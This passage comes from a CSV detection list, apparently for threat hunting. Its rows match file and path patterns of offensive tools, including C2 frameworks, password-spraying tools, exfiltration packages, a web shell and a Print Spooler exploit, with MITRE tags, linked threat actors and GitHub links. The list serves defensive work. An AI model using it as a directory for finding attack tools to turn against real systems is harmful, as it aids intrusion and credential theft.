T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","11513" "*/spectaskbook.py*",".{0,1000}\/spectaskbook\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","11514" "*/specula.py*",".{0,1000}\/specula\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","11515" "*/specula_log.txt*",".{0,1000}\/specula_log\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","11516" "*/specula-main.zip*",".{0,1000}\/specula\-main\.zip.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","11517" "*/spellbound.git*",".{0,1000}\/spellbound\.git.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","11518" "*/spellgen.py *",".{0,1000}\/spellgen\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. 
","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","11519" "*/spellstager.py *",".{0,1000}\/spellstager\.py\s.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z","11520" "*/spider.yaml*",".{0,1000}\/spider\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","11521" "*/spider_plus.py*",".{0,1000}\/spider_plus\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","11522" "*/SpiderFoot-*.log.cs*",".{0,1000}\/SpiderFoot\-.{0,1000}\.log\.cs.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","0","#linux","N/A","6","10","N/A","N/A","N/A","N/A","11523" "*/SpiderFoot.csv*",".{0,1000}\/SpiderFoot\.csv.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - 
T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","0","#linux","N/A","6","10","N/A","N/A","N/A","N/A","11524" "*/spiderfoot.git*",".{0,1000}\/spiderfoot\.git.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A","11525" "*/SpiderMate/Jatayu*",".{0,1000}\/SpiderMate\/Jatayu.{0,1000}","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","C2","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","N/A","10","33","9","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z","11526" "*/spinningteacup.py*",".{0,1000}\/spinningteacup\.py.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","11527" "*/splunk_whisperer.git*",".{0,1000}\/splunk_whisperer\.git.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","11529" "*/SplunkWhisperer2.git*",".{0,1000}\/SplunkWhisperer2\.git.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003 - TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","11530" "*/SPNSearcher.exe*",".{0,1000}\/SPNSearcher\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11531" "*/spoof/dns*",".{0,1000}\/spoof\/dns.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11532" "*/spoof/mdns*",".{0,1000}\/spoof\/mdns.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11533" "*/spoof/spoof_windows.*",".{0,1000}\/spoof\/spoof_windows\..{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11534" "*/spoofer.py*",".{0,1000}\/spoofer\.py.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","1","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","11535" "*/spoofing-office-macro.git*",".{0,1000}\/spoofing\-office\-macro\.git.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & 
Spoofing","https://github.com/christophetd/spoofing-office-macro","1","1","N/A","N/A","9","4","381","82","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z","11536" "*/spoofIPs_client.py*",".{0,1000}\/spoofIPs_client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","11537" "*/SpookFlare.git*",".{0,1000}\/SpookFlare\.git.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","11538" "*/spooler.py*",".{0,1000}\/spooler\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","11539" "*/SpoolFool.exe*",".{0,1000}\/SpoolFool\.exe.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","1","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","11540" "*/SpoolFool.git*",".{0,1000}\/SpoolFool\.git.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - 
T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","1","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","11541" "*/SpoolFool.ps1*",".{0,1000}\/SpoolFool\.ps1.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","1","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","11542" "*/spoolsystem/SpoolTrigger/*",".{0,1000}\/spoolsystem\/SpoolTrigger\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - 
RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","11543" "*/SpoolTrigger.x64.dll*",".{0,1000}\/SpoolTrigger\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11544" "*/SpoolTrigger.x86.dll*",".{0,1000}\/SpoolTrigger\.x86\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11545" "*/spray/spray.py*",".{0,1000}\/spray\/spray\.py.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password 
spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","11546" "*/Spray365*",".{0,1000}\/Spray365.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","11547" "*/Spray-AD.*",".{0,1000}\/Spray\-AD\..{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - 
PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","N/A","10","10","436","54","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z","11548" "*/SprayAD.exe*",".{0,1000}\/SprayAD\.exe.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","11549" "*/Spray-AD/*",".{0,1000}\/Spray\-AD\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - 
CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","N/A","10","10","436","54","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z","11550" "*/spraycharles.git*",".{0,1000}\/spraycharles\.git.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","1","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","11551" "*/spraycharles.py*",".{0,1000}\/spraycharles\.py.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","1","N/A","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","11552" "*/sprayed-creds.txt*",".{0,1000}\/sprayed\-creds\.txt.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - 
T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","11553" "*/sprayers/owa.py*",".{0,1000}\/sprayers\/owa\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","11554" "*/sprayhound.git*",".{0,1000}\/sprayhound\.git.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","N/A","3","231","19","2024-12-31T08:09:37Z","2020-02-06T17:45:37Z","11555" "*/sprayhound/*.py*",".{0,1000}\/sprayhound\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","N/A","3","231","19","2024-12-31T08:09:37Z","2020-02-06T17:45:37Z","11556" "*/spraying.py*",".{0,1000}\/spraying\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","N/A","4","391","61","2025-02-21T16:40:23Z","2022-03-01T14:31:27Z","11557" "*/SprayingToolkit*",".{0,1000}\/SprayingToolkit.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","11558" "*/SprayingToolkit.git*",".{0,1000}\/SprayingToolkit\.git.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","#linux","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","11559" "*/SprayLove.py*",".{0,1000}\/SprayLove\.py.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","1","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","11560" "*/spray-results.txt*",".{0,1000}\/spray\-results\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","11561" "*/Spring4Shell-POC*",".{0,1000}\/Spring4Shell\-POC.{0,1000}","offensive_tool_keyword","Spring4Shell","Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation 
